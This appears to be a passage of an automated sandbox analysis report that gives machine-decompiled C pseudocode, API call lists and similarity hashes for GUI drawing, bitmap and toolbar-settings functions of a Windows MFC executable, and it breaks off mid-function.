Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5785Create$#2414CompatiblePixel$#1640#1641#323#640Color$BitmapBrushFillH_prologObjectRectSolid
String ID: LB$\B
API String ID: 672399798-2432678322
Opcode ID: 2d9f819e55e5af05ed88dd2da8ec726ac8eb8544df9b9b53f1882804ea27c239
Instruction ID: 313f9a843d6c1ad7ac72e3a4b07849e85401b5f300941fb5f6298cfcd401ad52
Opcode Fuzzy Hash: 2d9f819e55e5af05ed88dd2da8ec726ac8eb8544df9b9b53f1882804ea27c239
Instruction Fuzzy Hash: DC613571D00159AACF00EFE1ED859EEBBB9FF58304F11402AF505A7261DB389A85CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040153C, Relevance: 49.8, APIs: 33, Instructions: 253
windowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040153C(intOrPtr __ecx, void* __eflags) {
				struct tagSIZE _t84;
				intOrPtr _t106;
				long _t116;
				struct HICON__* _t119;
				signed int _t120;
				void* _t121;
				intOrPtr _t125;
				signed int _t136;
				intOrPtr _t138;
				intOrPtr _t139;
				intOrPtr _t140;
				struct tagSIZE _t145;
				struct tagSIZE* _t181;
				intOrPtr _t183;
				void* _t184;
				intOrPtr _t186;
				struct tagSIZE _t187;
				intOrPtr _t190;
				intOrPtr _t191;
				void* _t194;

				L004269E6();
				_t138 =  *((intOrPtr*)(_t194 + 0x14));
				_t183 = __ecx;
				_push(_t194 - 0x18);
				 *((intOrPtr*)(_t194 - 0x10)) = __ecx;
				L004014F6(_t138);
				_t190 =  *((intOrPtr*)(_t194 + 8));
				 *(_t194 - 4) =  *(_t194 - 4) & 0x00000000;
				_t181 = _t194 - 0x28;
				GetTextExtentPoint32A( *(_t190 + 8),  *(_t194 - 0x18),  *( *(_t194 - 0x18) - 8), _t181);
				_t84 =  *(_t194 - 0x28);
				 *(_t194 - 0x20) = _t84;
				_t145 = _t84 + 4;
				 *(_t194 - 0x20) = _t145;
				if(_t145 > 0xc8) {
					 *(_t194 - 0x20) = 0xc8;
				}
				 *(_t194 - 0x14) =  *(_t194 - 0x14) & 0x00000000;
				if( *((intOrPtr*)(_t138 + 0x20)) != 0) {
					_t136 = 0x12;
					 *(_t194 - 0x20) =  *(_t194 - 0x20) + _t136;
					 *(_t194 - 0x14) = _t136;
				}
				_push(_t183 + 0x60);
				L00426636();
				_t139 =  *((intOrPtr*)(_t194 + 0xc));
				_push(0x19);
				_push(_t139);
				_push(_t194 - 0x30);
				L004266F0();
				_push(6);
				_push(_t139);
				L004266EA();
				_push(6);
				_t184 =  *(_t194 - 0x20) + _t139;
				_push(_t184 + 5);
				L004266EA();
				_push(0x1a);
				_push(_t184 + 5);
				L004266EA();
				_push( *((intOrPtr*)(_t194 - 0x10)) + 0x58);
				L00426636();
				_push(0x19);
				_push(_t139 + 2);
				_push(_t194 - 0x30);
				L004266F0();
				_push(8);
				_push(_t139 + 2);
				L004266EA();
				_push(8);
				_push(_t184 + 2);
				L004266EA();
				_push( *((intOrPtr*)(_t194 - 0x10)) + 0x78);
				L00426636();
				_push(8);
				_push(_t184 + 4);
				_push(_t194 - 0x30);
				L004266F0();
				_push(0x19);
				_push(_t184 + 4);
				L004266EA();
				_push( *((intOrPtr*)(_t194 - 0x10)) + 0x68);
				L00426636();
				_push(0x1a);
				_push(_t139 - 1);
				_push(_t194 - 0x30);
				L004266F0();
				_t106 = _t184 + 6;
				_push(0x1a);
				 *((intOrPtr*)(_t194 + 8)) = _t106;
				_push(_t106);
				L004266EA();
				_push(0x1b);
				_push(_t139 - 1);
				_push(_t194 - 0x30);
				L004266F0();
				_push(0x1b);
				_push( *((intOrPtr*)(_t194 + 8)));
				L004266EA();
				_push( *((intOrPtr*)(_t194 - 0x10)) + 0x60);
				L00426636();
				_push(0x19);
				_push(0);
				_push(_t194 - 0x30);
				L004266F0();
				_push(0x19);
				_push(_t139);
				L004266EA();
				_push(0x19);
				_push(_t184 + 7);
				_push(_t194 - 0x30);
				L004266F0();
				_t186 =  *((intOrPtr*)(_t194 + 0x10));
				_push(0x19);
				_push( *((intOrPtr*)(_t186 + 8)));
				L004266EA();
				_push( *((intOrPtr*)(_t194 - 0x10)) + 0x58);
				L00426636();
				if(_t139 != 0) {
					_push(0x1b);
					_push(0);
					_push(_t194 - 0x30);
					L004266F0();
					_push(0x1b);
					_push(_t139);
					L004266EA();
				}
				_push(0x1b);
				_push( *((intOrPtr*)(_t194 + 8)));
				_push(_t194 - 0x30);
				L004266F0();
				_push(0x1b);
				_push( *((intOrPtr*)(_t186 + 8)));
				L004266EA();
				_t116 = GetSysColor(0xf);
				_t187 =  *(_t194 - 0x20);
				_push(_t116);
				_push(0x14);
				_push(_t187);
				_push(9);
				_push(_t139 + 3);
				L0042671A();
				_t119 =  *( *((intOrPtr*)(_t194 + 0x14)) + 0x20);
				if(_t119 != 0) {
					DrawIconEx( *(_t190 + 4), _t139 + 4, 8, _t119, 0x10, 0x10, 0, 0, 3);
				}
				_t120 =  *(_t194 - 0x14);
				_t191 =  *((intOrPtr*)(_t194 - 0x24));
				_t65 = _t139 + 3; // 0x3
				_t140 = _t120 + _t65;
				_t121 = 0x14;
				 *((intOrPtr*)(_t194 - 0x38)) = _t187 - _t120 + _t140;
				asm("cdq");
				_t125 = (_t121 - _t191 - _t181 >> 1) + 7;
				 *((intOrPtr*)(_t194 - 0x40)) = _t140;
				 *((intOrPtr*)(_t194 - 0x3c)) = _t125;
				 *((intOrPtr*)(_t194 - 0x34)) = _t125 + _t191;
				L00401BC7( *((intOrPtr*)(_t194 + 0x14)),  *((intOrPtr*)(_t194 - 0x10)) + 0x80);
				E004011B8( *((intOrPtr*)(_t194 + 0x14)), _t194 - 0x40);
				 *(_t194 - 4) =  *(_t194 - 4) | 0xffffffff;
				_t77 = _t187 + 6; // 0x6
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t194 - 0xc));
				return _t77;
			}

APIs

_EH_prolog.MSVCRT ref: 00421D5C
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00421D90
#5787.MFC42(?), ref: 00421DC7
#4297.MFC42(?,?,00000019,?), ref: 00421DD8
#4133.MFC42(?,00000006,?,?,00000019,?), ref: 00421DE2
#4133.MFC42(?,00000006,?,00000006,?,?,00000019,?), ref: 00421DF5
#4133.MFC42(?,0000001A,?,00000006,?,00000006,?,?,00000019,?), ref: 00421E02
#5787.MFC42(?,?,0000001A,?,00000006,?,00000006,?,?,00000019,?), ref: 00421E10
#4297.MFC42(?,?,00000019,?,?,0000001A,?,00000006,?,00000006,?,?,00000019,?), ref: 00421E21
#4133.MFC42(?,00000008,?,?,00000019,?,?,0000001A,?,00000006,?,00000006,?,?,00000019,?), ref: 00421E2E
#4133.MFC42(?,00000008,?,00000008,?,?,00000019,?,?,0000001A,?,00000006,?,00000006,?,?), ref: 00421E3B
#5787.MFC42(?,?,00000008,?,00000008,?,?,00000019,?,?,0000001A,?,00000006,?,00000006,?), ref: 00421E49
#4297.MFC42(?,00000000,00000008,?,?,00000008,?,00000008,?,?,00000019,?,?,0000001A,?,00000006), ref: 00421E5A
#4133.MFC42(00000000,00000019,?,00000000,00000008,?,?,00000008,?,00000008,?,?,00000019,?,?,0000001A), ref: 00421E67
#5787.MFC42(?,00000000,00000019,?,00000000,00000008,?,?,00000008,?,00000008,?,?,00000019,?,?), ref: 00421E75
#4297.MFC42(?,?,0000001A,?,00000000,00000019,?,00000000,00000008,?,?,00000008,?,00000008,?,?), ref: 00421E86
#4133.MFC42(?,0000001A,?,?,0000001A,?,00000000,00000019,?,00000000,00000008,?,?,00000008,?,00000008), ref: 00421E96
#4297.MFC42(?,?,0000001B,?,0000001A,?,?,0000001A,?,00000000,00000019,?,00000000,00000008,?,?), ref: 00421EA7
#4133.MFC42(?,0000001B,?,?,0000001B,?,0000001A,?,?,0000001A,?,00000000,00000019,?,00000000,00000008), ref: 00421EB3
#5787.MFC42(?,?,0000001B,?,?,0000001B,?,0000001A,?,?,0000001A,?,00000000,00000019,?,00000000), ref: 00421EC1
#4297.MFC42(?,00000000,00000019,?,?,0000001B,?,?,0000001B,?,0000001A,?,?,0000001A,?,00000000), ref: 00421ED0
#4133.MFC42(?,00000019,?,00000000,00000019,?,?,0000001B,?,?,0000001B,?,0000001A,?,?,0000001A), ref: 00421EDA
#4297.MFC42(?,?,00000019,?,00000019,?,00000000,00000019,?,?,0000001B,?,?,0000001B,?,0000001A), ref: 00421EEB
#4133.MFC42(?,00000019,?,?,00000019,?,00000019,?,00000000,00000019,?,?,0000001B,?,?,0000001B), ref: 00421EFA
#5787.MFC42(?,?,00000019,?,?,00000019,?,00000019,?,00000000,00000019,?,?,0000001B,?,?), ref: 00421F08
#4297.MFC42(?,00000000,0000001B,?,?,00000019,?,?,00000019,?,00000019,?,00000000,00000019,?,?), ref: 00421F1B
#4133.MFC42(?,0000001B,?,00000000,0000001B,?,?,00000019,?,?,00000019,?,00000019,?,00000000,00000019), ref: 00421F25
#4297.MFC42(?,?,0000001B,?,?,00000019,?,?,00000019,?,00000019,?,00000000,00000019,?,?), ref: 00421F35
#4133.MFC42(?,0000001B,?,?,0000001B,?,?,00000019,?,?,00000019,?,00000019,?,00000000,00000019), ref: 00421F41
GetSysColor.USER32(0000000F), ref: 00421F48
#2753.MFC42(?,00000009,00000000,00000014,00000000,?,00000019,?,00000019,?,00000000,00000019,?,?,0000001B,?), ref: 00421F5D
DrawIconEx.USER32 ref: 00421F80
#800.MFC42(?,?,00000009,00000000,00000014,00000000,?,00000019,?,00000019,?,00000000,00000019,?,?,0000001B), ref: 00421FD8

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4133$#4297$#5787$#2753#800ColorDrawExtentH_prologIconPoint32Text
String ID:
API String ID: 1791607649-0
Opcode ID: a57fcb370116a01f92f609e08d7a51872a30a691ee55f43de9a79847cada2ad6
Instruction ID: 8e621f14b41bf3480495747f93a6453a26f95988e6b21dbd7f422aa2148f89e2
Opcode Fuzzy Hash: a57fcb370116a01f92f609e08d7a51872a30a691ee55f43de9a79847cada2ad6
Instruction Fuzzy Hash: AC91A371700229ABCB14DF95DCA2FEEB7A9BB48704F41412EF505E72C1DB78A905CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040112C, Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 158
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040112C() {
				void* _t76;
				signed int _t84;
				void* _t94;
				intOrPtr _t95;
				int _t117;
				signed int _t118;
				intOrPtr _t119;
				int _t122;
				void* _t128;

				L004269E6();
				L004264B0();
				_t117 =  *(_t128 + 8);
				 *(_t128 - 4) = 0;
				GetObjectA( *(_t117 + 4), 0x18, _t128 - 0x70);
				_push(CreateCompatibleDC(0));
				L004264AA();
				if(_t117 != 0) {
					_t76 =  *(_t117 + 4);
				} else {
					_t76 = 0;
				}
				_push(_t76);
				_push( *(_t128 - 0x34));
				L00426540();
				 *(_t128 - 0x18) = _t76;
				L004264B0();
				L00401974(_t128 - 0x20);
				 *(_t128 - 0x20) = 0x42e55c;
				L00401974(_t128 - 0x28);
				 *(_t128 - 0x28) = 0x42e34c;
				 *(_t128 - 4) = 3;
				_push(CreateCompatibleDC(0));
				L004264AA();
				_push(CreateCompatibleBitmap( *(_t128 - 0x34),  *(_t128 - 0x6c),  *(_t128 - 0x68)));
				L004264BC();
				_push(CreateSolidBrush(0xc0c0c0));
				L004264BC();
				_t22 = _t128 - 0x28; // 0x42e34c
				asm("sbb eax, eax");
				_t84 =  ~_t22 &  *(_t128 - 0x24);
				_push(_t84);
				_push( *(_t128 - 0x44));
				L00426540();
				_t118 = _t84;
				 *(_t128 - 0x50) =  *(_t128 - 0x6c);
				 *(_t128 - 0x4c) =  *(_t128 - 0x68);
				_t29 = _t128 - 0x20; // 0x42e55c
				asm("sbb eax, eax");
				 *(_t128 - 0x58) = 0;
				 *((intOrPtr*)(_t128 - 0x54)) = 0;
				FillRect( *(_t128 - 0x44), _t128 - 0x58,  ~_t29 &  *(_t128 - 0x1c));
				 *((intOrPtr*)(_t128 - 0x10)) = GetPixel( *(_t128 - 0x44), 1, 1);
				L00425FA6();
				if(_t118 != 0) {
					_t119 =  *((intOrPtr*)(_t118 + 4));
				} else {
					_t119 = 0;
				}
				_push(_t119);
				_push( *(_t128 - 0x44));
				L00426540();
				 *(_t128 - 0x14) = GetSysColor(0xf);
				 *(_t128 + 8) = 0;
				if( *(_t128 - 0x6c) > 0) {
					do {
						_t122 = 0;
						if( *(_t128 - 0x68) > 0) {
							do {
								if(GetPixel( *(_t128 - 0x34),  *(_t128 + 8), _t122) ==  *((intOrPtr*)(_t128 - 0x10))) {
									SetPixel( *(_t128 - 0x34),  *(_t128 + 8), _t122,  *(_t128 - 0x14));
								}
								_t122 = _t122 + 1;
							} while (_t122 <  *(_t128 - 0x68));
						}
						 *(_t128 + 8) =  *(_t128 + 8) + 1;
					} while ( *(_t128 + 8) <  *(_t128 - 0x6c));
				}
				_t94 =  *(_t128 - 0x18);
				if(_t94 != 0) {
					_t95 =  *((intOrPtr*)(_t94 + 4));
				} else {
					_t95 = 0;
				}
				_push(_t95);
				_push( *(_t128 - 0x34));
				L00426540();
				 *(_t128 - 0x28) = 0x42c514;
				 *(_t128 - 4) = 4;
				L00425FA6();
				 *(_t128 - 0x20) = 0x42c514;
				 *(_t128 - 0x28) = 0x42c4fc;
				 *(_t128 - 4) = 5;
				L00425FA6();
				 *(_t128 - 0x20) = 0x42c4fc;
				 *(_t128 - 4) = 0;
				L0042649E();
				 *(_t128 - 4) =  *(_t128 - 4) | 0xffffffff;
				L0042649E();
				 *[fs:0x0] =  *((intOrPtr*)(_t128 - 0xc));
				return _t95;
			}

APIs

_EH_prolog.MSVCRT ref: 00416CCF
#323.MFC42 ref: 00416CDD
GetObjectA.GDI32(?,00000018,?), ref: 00416CF3
CreateCompatibleDC.GDI32(00000000), ref: 00416D00
#1640.MFC42(00000000), ref: 00416D06
#5785.MFC42(?,?,00000000), ref: 00416D1A
#323.MFC42(?,?,00000000), ref: 00416D25
CreateCompatibleDC.GDI32(00000000), ref: 00416D4D
#1640.MFC42(00000000), ref: 00416D53
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00416D61
#1641.MFC42(00000000), ref: 00416D6B
CreateSolidBrush.GDI32(00C0C0C0), ref: 00416D75
#1641.MFC42(00000000), ref: 00416D7F
#5785.MFC42(?,?,00000000), ref: 00416D92
FillRect.USER32 ref: 00416DBD
GetPixel.GDI32(?,00000001,00000001), ref: 00416DD0
#2414.MFC42 ref: 00416DD8
#5785.MFC42(?,?), ref: 00416DEC
GetSysColor.USER32(0000000F), ref: 00416DF3
GetPixel.GDI32(?,?,00000000), ref: 00416E12
SetPixel.GDI32(?,?,00000000,?), ref: 00416E23
#5785.MFC42(?,00000003), ref: 00416E4C
#2414.MFC42(?,00000003), ref: 00416E60
#2414.MFC42(?,00000003), ref: 00416E77
#640.MFC42(?,00000003), ref: 00416E85
#640.MFC42(?,00000003), ref: 00416E91

Strings

LB, xrefs: 00416D68
\B, xrefs: 00416D7C

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5785Create$#2414CompatiblePixel$#1640#1641#323#640$BitmapBrushColorFillH_prologObjectRectSolid
String ID: LB$\B
API String ID: 4078948297-2432678322
Opcode ID: 800081178e2e60d2f4a4478195b5793cb73e8f7a2514b860bd97473076329dae
Instruction ID: ee6b797c4c201efc0c7bec6ebf3fb44d38b03c1f70a108526d7de10351dceb75
Opcode Fuzzy Hash: 800081178e2e60d2f4a4478195b5793cb73e8f7a2514b860bd97473076329dae
Instruction Fuzzy Hash: E5514672E00258EACF01EFE5ED819EEBB75FF48304F51412AE405A7251DB389A85CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004114E7, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E004114E7(void* __eax, void* __ecx, intOrPtr _a4) {
				char _v260;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t45;
				CHAR* _t46;
				CHAR* _t47;
				CHAR* _t48;
				CHAR* _t49;
				CHAR* _t50;
				CHAR* _t51;
				CHAR* _t52;
				CHAR* _t53;
				CHAR* _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				void* _t76;

				_t76 = __ecx;
				L00425E44();
				L00426510();
				wsprintfA( &_v260, "%s-SCBar-%d", _a4, __eax);
				_t55 =  *((intOrPtr*)(_t76 + 0x9c));
				_push( *((intOrPtr*)(_t76 + 0x84)));
				_t43 =  &_v260;
				_push("sizeHorzCX");
				_push(_t43);
				L00425E3E();
				if(_t55 <= _t43) {
					_push( *((intOrPtr*)(_t76 + 0x84)));
					_t44 =  &_v260;
					_push("sizeHorzCX");
					_push(_t44);
					L00425E3E();
				} else {
					_t44 = _t55;
				}
				_push( *((intOrPtr*)(_t76 + 0x88)));
				_t56 =  *((intOrPtr*)(_t76 + 0xa0));
				 *((intOrPtr*)(_t76 + 0x84)) = _t44;
				_t45 =  &_v260;
				_push("sizeHorzCY");
				_push(_t45);
				L00425E3E();
				if(_t56 <= _t45) {
					_push( *((intOrPtr*)(_t76 + 0x88)));
					_t46 =  &_v260;
					_push("sizeHorzCY");
					_push(_t46);
					L00425E3E();
				} else {
					_t46 = _t56;
				}
				_push( *((intOrPtr*)(_t76 + 0x8c)));
				_t57 =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(_t76 + 0x88)) = _t46;
				_t47 =  &_v260;
				_push("sizeVertCX");
				_push(_t47);
				L00425E3E();
				if(_t57 <= _t47) {
					_push( *((intOrPtr*)(_t76 + 0x8c)));
					_t48 =  &_v260;
					_push("sizeVertCX");
					_push(_t48);
					L00425E3E();
				} else {
					_t48 = _t57;
				}
				_push( *((intOrPtr*)(_t76 + 0x90)));
				_t58 =  *((intOrPtr*)(_t76 + 0xa8));
				 *((intOrPtr*)(_t76 + 0x8c)) = _t48;
				_t49 =  &_v260;
				_push("sizeVertCY");
				_push(_t49);
				L00425E3E();
				if(_t58 <= _t49) {
					_push( *((intOrPtr*)(_t76 + 0x90)));
					_t50 =  &_v260;
					_push("sizeVertCY");
					_push(_t50);
					L00425E3E();
				} else {
					_t50 = _t58;
				}
				_push( *((intOrPtr*)(_t76 + 0x94)));
				_t59 =  *((intOrPtr*)(_t76 + 0xac));
				 *((intOrPtr*)(_t76 + 0x90)) = _t50;
				_t51 =  &_v260;
				_push("sizeFloatCX");
				_push(_t51);
				L00425E3E();
				if(_t59 <= _t51) {
					_push( *((intOrPtr*)(_t76 + 0x94)));
					_t52 =  &_v260;
					_push("sizeFloatCX");
					_push(_t52);
					L00425E3E();
				} else {
					_t52 = _t59;
				}
				_push( *((intOrPtr*)(_t76 + 0x98)));
				_t60 =  *((intOrPtr*)(_t76 + 0xb0));
				 *((intOrPtr*)(_t76 + 0x94)) = _t52;
				_t53 =  &_v260;
				_push("sizeFloatCY");
				_push(_t53);
				L00425E3E();
				if(_t60 <= _t53) {
					_push( *((intOrPtr*)(_t76 + 0x98)));
					_t54 =  &_v260;
					_push("sizeFloatCY");
					_push(_t54);
					L00425E3E();
				} else {
					_t54 = _t60;
				}
				 *((intOrPtr*)(_t76 + 0x98)) = _t54;
				return _t54;
			}

APIs

#1168.MFC42 ref: 004114F5
#3089.MFC42 ref: 004114FF
wsprintfA.USER32 ref: 00411514
#3521.MFC42(?,sizeHorzCX,?), ref: 00411537
#3521.MFC42(?,sizeHorzCX,?,?,sizeHorzCX,?), ref: 00411558
#3521.MFC42(?,sizeHorzCY,?,?,sizeHorzCX,?,?,sizeHorzCX,?), ref: 0041157D
#3521.MFC42(?,sizeHorzCY,?,?,sizeHorzCY,?,?,sizeHorzCX,?,?,sizeHorzCX,?), ref: 0041159E
#3521.MFC42(?,sizeVertCX,?,?,sizeHorzCY,?,?,sizeHorzCY,?,?,sizeHorzCX,?,?,sizeHorzCX,?), ref: 004115C3
#3521.MFC42(?,sizeVertCX,?,?,sizeVertCX,?,?,sizeHorzCY,?,?,sizeHorzCY,?,?,sizeHorzCX,?,?), ref: 004115E4
#3521.MFC42(?,sizeVertCY,?,?,sizeVertCX,?,?,sizeVertCX,?,?,sizeHorzCY,?,?,sizeHorzCY,?,?), ref: 00411609
#3521.MFC42(?,sizeVertCY,?,?,sizeVertCY,?,?,sizeVertCX,?,?,sizeVertCX,?,?,sizeHorzCY,?,?), ref: 0041162A
#3521.MFC42(?,sizeFloatCX,?,?,sizeVertCY,?,?,sizeVertCY,?,?,sizeVertCX,?,?,sizeVertCX,?,?), ref: 0041164F
#3521.MFC42(?,sizeFloatCX,?,?,sizeFloatCX,?,?,sizeVertCY,?,?,sizeVertCY,?,?,sizeVertCX,?,?), ref: 00411670
#3521.MFC42(?,sizeFloatCY,?,?,sizeFloatCX,?,?,sizeFloatCX,?,?,sizeVertCY,?,?,sizeVertCY,?,?), ref: 00411695
#3521.MFC42(?,sizeFloatCY,?,?,sizeFloatCY,?,?,sizeFloatCX,?,?,sizeFloatCX,?,?,sizeVertCY,?,?), ref: 004116B6

Strings

sizeVertCY, xrefs: 00411624
sizeFloatCY, xrefs: 004116B0
sizeVertCX, xrefs: 004115BB
%s-SCBar-%d, xrefs: 0041150E
sizeHorzCX, xrefs: 00411531
sizeFloatCX, xrefs: 0041166A
sizeHorzCX, xrefs: 00411552
sizeHorzCY, xrefs: 00411598
sizeFloatCX, xrefs: 00411647
sizeVertCX, xrefs: 004115DE
sizeFloatCY, xrefs: 0041168D
sizeVertCY, xrefs: 00411601
sizeHorzCY, xrefs: 00411575

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3521$#1168#3089wsprintf
String ID: %s-SCBar-%d$sizeFloatCX$sizeFloatCX$sizeFloatCY$sizeFloatCY$sizeHorzCX$sizeHorzCX$sizeHorzCY$sizeHorzCY$sizeVertCX$sizeVertCX$sizeVertCY$sizeVertCY
API String ID: 4142564528-3161464612
Opcode ID: bb898db687b8147469851e7479a399ff54c7d881de040778f75372e9c5eca4b3
Instruction ID: 1b8e30a190424b5a939b1aec085ebcf61c44688613ad642de1f0b12875628a5e
Opcode Fuzzy Hash: bb898db687b8147469851e7479a399ff54c7d881de040778f75372e9c5eca4b3
Instruction Fuzzy Hash: 5F41BA34700715ABCB219B708D91FEBB7EABB48308F10045FF69ED3351DA7969948B18

Uniqueness

Uniqueness Score: -1.00%

Function 00401140, Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 232
windowCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00401140(intOrPtr __ecx, void* __fp0) {
				void* _t110;
				void* _t112;
				int _t113;
				struct HWND__* _t116;
				struct HDC__* _t118;
				long _t137;
				struct HWND__* _t142;
				intOrPtr _t145;
				long _t146;
				long _t152;
				void* _t165;
				struct HDC__* _t199;
				intOrPtr* _t204;
				void* _t207;
				void* _t217;

				_t217 = __fp0;
				L004269E6();
				 *(_t207 - 0x14) =  *(_t207 - 0x14) & 0x00000000;
				_t204 = ImageList_AddMasked;
				_push( *(_t207 + 0xc));
				 *((intOrPtr*)(_t207 - 0x10)) = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) == 0) {
					_t110 = L00402239();
					 *(_t207 - 0x18) = _t110;
					if(_t110 == 0) {
						L00401974(_t207 - 0x24);
						 *(_t207 - 0x24) = 0x42e34c;
						_t34 = _t207 - 0x24; // 0x42e34c
						 *(_t207 - 4) = 1;
						_t112 = L004015AF(_t34,  *(_t207 + 0xc));
						_t199 =  *(_t207 + 8);
						if(_t112 != 0) {
							_t38 = _t207 - 0x24; // 0x42e34c
							 *0x4421ec = 1;
							E0040112C();
							_t145 =  *((intOrPtr*)(_t207 - 0x10));
							if( *((intOrPtr*)(_t145 + 0x34)) == 0) {
								_t146 = GetSysColor(0xf);
								_t44 = _t207 - 0x24; // 0x42e34c
								_push(_t146);
								asm("sbb ecx, ecx");
								_push( ~_t44 &  *(_t207 - 0x20));
							} else {
								_t42 = _t207 - 0x24; // 0x42e34c
								asm("sbb eax, eax");
								_push( *((intOrPtr*)(_t145 + 0x30)));
								_push( ~_t42 &  *(_t207 - 0x20));
							}
							_push( *(_t199 + 4));
							if( *_t204() >= 0) {
								 *(_t207 - 0x14) = 1;
							}
						}
						 *(_t207 - 4) =  *(_t207 - 4) | 0xffffffff;
						 *(_t207 - 0x24) = 0x42e34c;
						_t51 = _t207 - 0x24; // 0x42e34c
						_t165 = _t51;
					} else {
						L00401974(_t207 - 0x24);
						 *(_t207 - 0x24) = 0x42e34c;
						_push( *(_t207 - 0x18));
						 *(_t207 - 4) =  *(_t207 - 4) & 0x00000000;
						L004264BC();
						if( *((intOrPtr*)(__ecx + 0x34)) == 0) {
							_t152 = GetSysColor(0xf);
							_t20 = _t207 - 0x24; // 0x42e34c
							_push(_t152);
							asm("sbb ecx, ecx");
							_push( ~_t20 &  *(_t207 - 0x20));
						} else {
							_t18 = _t207 - 0x24; // 0x42e34c
							asm("sbb eax, eax");
							_push( *((intOrPtr*)(__ecx + 0x30)));
							_push( ~_t18 &  *(_t207 - 0x20));
						}
						_t199 =  *(_t207 + 8);
						_push( *(_t199 + 4));
						if( *_t204() >= 0) {
							 *(_t207 - 0x14) = 1;
						}
						L00426714();
						DeleteObject( *(_t207 - 0x18));
